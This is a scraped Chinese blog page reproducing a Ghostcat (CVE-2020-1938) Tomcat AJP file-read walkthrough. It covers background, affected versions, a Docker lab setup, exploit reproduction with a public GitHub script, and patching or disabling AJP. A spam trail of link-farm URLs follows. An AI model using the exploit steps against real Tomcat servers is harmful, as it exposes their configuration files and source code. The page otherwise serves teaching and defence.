当前位置: 首页 > news >正文 做一个网站需要哪些纺织行业网站怎么做 news 2025/10/31 11:19:46 做一个网站需要哪些,纺织行业网站怎么做,品牌建设的定义,如何自己做个简单网站1.漏洞原理 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器#xff0c;其安装后会默认开启ajp连接器#xff0c;方便与其他web服务器通过ajp协议进行交互。属于轻量级应用服务器#xff0c;在中小型系统和并发访问用户不是很多的场合下被普遍使用#xff0c;是开发…1.漏洞原理 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器其安装后会默认开启ajp连接器方便与其他web服务器通过ajp协议进行交互。属于轻量级应用服务器在中小型系统和并发访问用户不是很多的场合下被普遍使用是开发和调试JSP 程序的首选。Tomcat和IIS等Web服务器一样具有处理HTML页面的功能另外它还是一个Servlet和JSP容器独立的Servlet容器是Tomcat的默认模式。不过Tomcat处理静态HTML的能力不如Apache服务器。Tomcat是Apache开源组织开发的用于处理HTTP服务的项目两者都是免费的都可以做为独立的Web服务器运行。Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。而该漏洞是由于Tomcat AJP协议存在缺陷而导致攻击者可通过构造特定参数读取webapp目录下的任意文件。 2.漏洞概述与分析 Tomcat是Apache开源组织开发的用于处理HTTP服务的项目两者都是免费的都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件如webapp 配置文件或源代码等。 AJP Connector Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求以及把Tomcat服务器的响应结果发送给客户。在Apache Tomcat服务器中我们平时用的最多的8080端口就是所谓的Http Connector使用HttpHTTP/1.1协议 在conf/server.xml文件里他对应的配置为 Connectorport8080protocolHTTP/1.1connectionTimeout20000redirectPort“8443” /而 AJP Connector它使用的是 AJP 协议Apache Jserv Protocol是定向包协议。因为性能原因使用二进制格式来传输可读性文本它能降低 HTTP 请求的处理成本因此主要在需要集群、反向代理的场景被使用。 Ajp协议对应的配置为 Connectorport8009protocolAJP/1.3redirectPort“8443” /Tomcat服务器默认对外网开启该端口 Web客户访问Tomcat服务器的两种方式: Apache 服务器 1AJP是一个二进制的TCP传输协议。浏览器无法使用AJP而是首先由Apache与Tomca进行AJP的通信然后由Apache通过proxy_ajp模块进行反向代理将其转换成 HTTP服务器再暴露给用户允许用户进行访问。 2这样做的原因是相对于HTTP纯文本协议来说效率和性能更高同时也做了很多优化。在某种程度上AJP可以理解为HTTP的二进制版因加快传输效率被广泛应用。实际情况是类似Apache这样有proxy_ajp模块可以反向代理AJP协议的服务器很少所以 AJP协议在生产环境中也很少被用到。 3.影响范围 Apache Tomcat 6 Tomcat 7系列 7.0.100 Tomcat 8系列 8.5.51 Tomcat 9 系列 9.0.31 4.搭建弱点环境 4.1 Ubuntu 4.2 更新资源update 4.3 安装docker sudo apt-get update sudo apt-get install docker sudo apt-get install docker.io sudo apt-get install docker-registry sudo docker version 4.4 安装nmap apt-get install nmap 4.5 安装Tomcat docker search Tomcat-8.5.32 docker pull duonghuuphuc/tomcat-8.5.32 4.6 查看拉取的Tomcat镜像 docker images 4.7 启动镜像 Dockerrun-d -p 80808080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32 docker port ghostcat 4.8 查看ip地址为192.168.86.129 ifconfig -a 4.9 浏览器可以访问Tomcat页面表示环境搭建成功 192.168.86.129:8080 5.漏洞复现 5.1 docker exec -it ghostcat /bin/bash cd webapps/ROOT/ 5.2 添加测试文件 echo ‘this is CVE-2020-1938’test.txt ls cat test.txt 5.3 exp地址https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi ls 5.4 cd CNVD-2020-10487-Tomcat-Ajp-lfi/ ls chomd x CNVD-2020-10487-Tomcat-Ajp-lfi.py ls 5.5 利用exp读取该文件 ****./****CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f test.txt 192.168.86.129 测试读取成功 6.漏洞修复、防御方法 Apache Tomcat文件包含漏洞修复方式为更新高版本目前Apache官方已发布9.0.31、8.5.51及7.0.100版本对此漏洞进行修复如果相关用户暂时无法进行版本升级可根据自身情况采用下列防护措施若不需要使用Tomcat AJP协议可直接关闭AJP Connector或将其监听地址改为仅监听本机localhost若需使用Tomcat AJP协议可根据使用版本配置协议属性设置认证凭证。如下 1、将Tomcat立即升级到9.0.31、8.5.51或7.0.100版本进行修复。 2、禁用或限制AJP协议。 编辑 /conf/server.xml找到如下行 Connector port8009protocol“AJP/1.3” redirectPort“8443” / 将此行注释掉也可删掉该行 配置secret来设置AJP协议的认证凭证。 例如注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值 Connector port8009protocol“AJP/1.3” redirectPort8443address“YOUR_TOMCAT_IP_ADDRESS” secret“YOUR_TOMCAT_AJP_SECRET”/ 3.配置访问控制合理配置访问控制是防范漏洞的重要措施之一。通过配置适当的访问控制策略可以限制对敏感文件的访问并仅允许授权用户进行相关操作。 4.定期监测和更新定期监测漏洞信息和安全公告并及时更新相关软件和补丁以确保系统的安全性和稳定性。 5.强化服务器安全性除了针对特定漏洞采取措施外还应加强整个服务器的安全性。例如使用防火墙限制对服务器的访问、启用Web应用程序防火墙WAF、配置SSL/TLS加密传输、使用强密码和定期更换密码、禁用不必要的服务等。 文章转载自: http://www.morning.lptjt.cn.gov.cn.lptjt.cn http://www.morning.zwdrz.cn.gov.cn.zwdrz.cn http://www.morning.tnqk.cn.gov.cn.tnqk.cn http://www.morning.dgsx.cn.gov.cn.dgsx.cn http://www.morning.jcfg.cn.gov.cn.jcfg.cn http://www.morning.rybr.cn.gov.cn.rybr.cn http://www.morning.qqzdr.cn.gov.cn.qqzdr.cn http://www.morning.crdtx.cn.gov.cn.crdtx.cn http://www.morning.yhtnr.cn.gov.cn.yhtnr.cn http://www.morning.rysmn.cn.gov.cn.rysmn.cn http://www.morning.yknsr.cn.gov.cn.yknsr.cn http://www.morning.cklld.cn.gov.cn.cklld.cn http://www.morning.yckrm.cn.gov.cn.yckrm.cn http://www.morning.nbnq.cn.gov.cn.nbnq.cn http://www.morning.rfldz.cn.gov.cn.rfldz.cn http://www.morning.mcwrg.cn.gov.cn.mcwrg.cn http://www.morning.xlxmy.cn.gov.cn.xlxmy.cn http://www.morning.wdrxh.cn.gov.cn.wdrxh.cn http://www.morning.mhcft.cn.gov.cn.mhcft.cn http://www.morning.gidmag.com.gov.cn.gidmag.com http://www.morning.wslr.cn.gov.cn.wslr.cn http://www.morning.fdzzh.cn.gov.cn.fdzzh.cn http://www.morning.ryxdr.cn.gov.cn.ryxdr.cn http://www.morning.zpxwg.cn.gov.cn.zpxwg.cn http://www.morning.qwhbk.cn.gov.cn.qwhbk.cn http://www.morning.rglzy.cn.gov.cn.rglzy.cn http://www.morning.qsmdd.cn.gov.cn.qsmdd.cn http://www.morning.lrprj.cn.gov.cn.lrprj.cn http://www.morning.lqlc.cn.gov.cn.lqlc.cn http://www.morning.woyoua.com.gov.cn.woyoua.com http://www.morning.nj-ruike.cn.gov.cn.nj-ruike.cn http://www.morning.nbmyg.cn.gov.cn.nbmyg.cn http://www.morning.xpmwt.cn.gov.cn.xpmwt.cn http://www.morning.yzygj.cn.gov.cn.yzygj.cn http://www.morning.tyhfz.cn.gov.cn.tyhfz.cn http://www.morning.gqjwz.cn.gov.cn.gqjwz.cn http://www.morning.xtgzp.cn.gov.cn.xtgzp.cn http://www.morning.kjksn.cn.gov.cn.kjksn.cn http://www.morning.kzxlc.cn.gov.cn.kzxlc.cn http://www.morning.wbyqy.cn.gov.cn.wbyqy.cn http://www.morning.jlmrx.cn.gov.cn.jlmrx.cn http://www.morning.ndpwg.cn.gov.cn.ndpwg.cn http://www.morning.rlxg.cn.gov.cn.rlxg.cn http://www.morning.lstmg.cn.gov.cn.lstmg.cn http://www.morning.tqdqc.cn.gov.cn.tqdqc.cn http://www.morning.fswml.cn.gov.cn.fswml.cn http://www.morning.jfjpn.cn.gov.cn.jfjpn.cn http://www.morning.qkbwd.cn.gov.cn.qkbwd.cn http://www.morning.lfqnk.cn.gov.cn.lfqnk.cn http://www.morning.gbwfx.cn.gov.cn.gbwfx.cn http://www.morning.mgwdp.cn.gov.cn.mgwdp.cn http://www.morning.nnmnz.cn.gov.cn.nnmnz.cn http://www.morning.wjhpg.cn.gov.cn.wjhpg.cn http://www.morning.dhckp.cn.gov.cn.dhckp.cn http://www.morning.lmfmd.cn.gov.cn.lmfmd.cn http://www.morning.tkgjl.cn.gov.cn.tkgjl.cn http://www.morning.fdfsh.cn.gov.cn.fdfsh.cn http://www.morning.c7497.cn.gov.cn.c7497.cn http://www.morning.kpcxj.cn.gov.cn.kpcxj.cn http://www.morning.jcrfm.cn.gov.cn.jcrfm.cn http://www.morning.lzjxn.cn.gov.cn.lzjxn.cn http://www.morning.xkqjw.cn.gov.cn.xkqjw.cn http://www.morning.zkqjz.cn.gov.cn.zkqjz.cn http://www.morning.cbczs.cn.gov.cn.cbczs.cn http://www.morning.ynrzf.cn.gov.cn.ynrzf.cn http://www.morning.rbbzn.cn.gov.cn.rbbzn.cn http://www.morning.fpxyy.cn.gov.cn.fpxyy.cn http://www.morning.fbpdp.cn.gov.cn.fbpdp.cn http://www.morning.rcklc.cn.gov.cn.rcklc.cn http://www.morning.rykgh.cn.gov.cn.rykgh.cn http://www.morning.ldmtq.cn.gov.cn.ldmtq.cn http://www.morning.wqkzf.cn.gov.cn.wqkzf.cn http://www.morning.qsfys.cn.gov.cn.qsfys.cn http://www.morning.lmrcq.cn.gov.cn.lmrcq.cn http://www.morning.nbybb.cn.gov.cn.nbybb.cn http://www.morning.qkqzm.cn.gov.cn.qkqzm.cn http://www.morning.prplf.cn.gov.cn.prplf.cn http://www.morning.csnmd.cn.gov.cn.csnmd.cn http://www.morning.nsncq.cn.gov.cn.nsncq.cn http://www.morning.ktrdc.cn.gov.cn.ktrdc.cn 查看全文 http://www.tj-hxxt.cn/news/265040.html 相关文章: 做论坛网站赚钱吗昆山网站建设兼职 网站站内链接学ps网课平台哪个好 青岛高端网站开发公司建设一个一般网站需要多少钱 PHP做的网站能容纳多少人wordpress弹出相册 网站建设实训总结300阿里云网站备案登陆 用织梦做房产网站杭州网站建设 网站开发费计入什么科目合适网络营销方案策划论文 wordpress怎么链接到文件夹成都纯手工seo 北京网站建设最大的公司排名兴宁市住房和城乡建设部网站 新手 网站建设 书籍网站备案域名用二级域名 仿站软件做网站赚钱要多久 网站流量变现辛集建设局网站 地方社区网站 备案软件开发外包工作室 扬州西区网站建设展览馆网站建设 广元做网站站排名链家网站谁做的 自己怎么建网站卖东西单页网站cpa虚拟主机 做网站容易 但运营难网站建设开封软件制作 深圳便宜建网站宽带开户多少钱 论文收录网站分析网站优缺点 怎样用源代码做网站洛可可设计公司产品 网站开发教材义乌推广公司 网站整站htmlwordpress建站容易吗 广东手机网站建设报价百度官方网站 搭建公司网站费用最好的包装设计公司哪家好 推广型网站制作公司中國無法訪問wordpress 手机网站 触屏建设网站后申请什么类型专利 网站开发 企业宣传册构建一个网站需要多少钱 柯桥建设局网站wordpress主题模板文件下载 网站建设费用的财务核算网站的设计与实现 与做机器人有关的网站金环建设集团网站
